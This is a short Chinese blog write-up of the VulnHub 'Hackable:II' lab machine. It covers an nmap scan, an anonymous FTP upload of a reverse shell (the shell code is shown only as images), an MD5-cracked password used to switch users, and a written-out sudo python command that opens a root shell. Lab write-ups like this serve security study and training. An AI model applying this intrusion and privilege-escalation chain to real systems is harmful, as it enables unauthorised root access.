Vulnhub: Hackable:II靶机

kali:192.168.111.111

靶机:192.168.111.142

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.142

image

网站的files目录

image

ftp存在匿名登录,所在目录为网站的files目录

image

ftp上传反弹shell

image

image

image

提权

目标根目录下的.runme.sh

image

md5解密后切换到shrek用户

image

image

shrek的sudo权限

image

提权方法:https://gtfobins.github.io/gtfobins/python/#sudo

image

提升为root

sudo -u root /usr/bin/python3.5 -c 'import os;os.system("/bin/bash")'

image

posted @   ctostm  阅读(15)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· TypeScript + Deepseek 打造卜卦网站:技术与玄学的结合
· Manus的开源复刻OpenManus初探
· AI 智能体引爆开源社区「GitHub 热点速览」
· 三行代码完成国际化适配,妙~啊~
· .NET Core 中如何实现缓存的预热?
点击右上角即可分享
微信分享提示